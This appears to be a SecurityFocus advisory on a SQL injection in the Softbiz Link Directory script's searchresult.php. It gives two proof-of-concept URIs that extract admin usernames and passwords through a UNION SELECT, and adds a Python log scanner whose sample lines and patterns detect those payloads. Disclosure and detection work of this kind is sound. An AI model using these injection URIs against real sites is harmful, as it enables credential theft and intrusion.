Softbiz Link Directory Script SEARCHRESULT.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

To find username:
http://www.example.com/searchresult.php?sbcat_id=999999%20union/**/select/**/0,username,2,3/**/from/**/sblnk_admin/*
To find password:
http://www.example.com/searchresult.php?sbcat_id=999999%20union/**/select/**/0,password,2,3/**/from/**/sblnk_admin/*
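
For detection, the requests above stand out in web server logs because sbcat_id carries more than a number. The following is an added example, not part of the original advisory or the Softbiz code: it scans access-log lines for searchresult.php requests whose decoded sbcat_id is not a plain integer. The combined log format, the sample lines and the assumption that legitimate category ids are purely numeric are all assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); addresses and times are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] "GET /searchresult.php?sbcat_id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2010:10:00:07 +0000] "GET /searchresult.php?sbcat_id=999999%20union/**/select/**/0,username,2,3/**/from/**/sblnk_admin/* HTTP/1.1" 200 734',
    '203.0.113.9 - - [01/Jan/2010:10:00:09 +0000] "GET /searchresult.php?sbcat_id=999999%20UNION/**/SELECT/**/0,password,2,3/**/from/**/sblnk_admin/* HTTP/1.1" 200 761',
    '203.0.113.7 - - [01/Jan/2010:10:01:00 +0000] "GET /index.php?sbcat_id=1%20union HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# C-style SQL comments, closed (/**/) or left open at the end of the value (/*).
COMMENT_RE = re.compile(r'/\*.*?(?:\*/|$)', re.S)


def classify(value):
    """Return None for a plain integer id, otherwise a short verdict string."""
    if re.fullmatch(r'\d+', value):
        return None
    # Comments used in place of spaces are replaced by spaces before matching.
    flat = ' '.join(COMMENT_RE.sub(' ', value).lower().split())
    if re.search(r'\bunion\b.*\bselect\b', flat):
        return 'union-select'
    return 'non-numeric'


def scan(lines):
    """Return (client, verdict, decoded sbcat_id) for each suspicious request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        # Only the script named in the advisory is in scope here.
        if not url.path.lower().endswith('/searchresult.php'):
            continue
        for value in parse_qs(url.query).get('sbcat_id', []):
            verdict = classify(value)
            if verdict:
                findings.append((line.split()[0], verdict, value))
    return findings


if __name__ == '__main__':
    for client, verdict, value in scan(SAMPLE_LOG):
        print(client, verdict, value)
```
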

Copyright 2010, SecurityFocus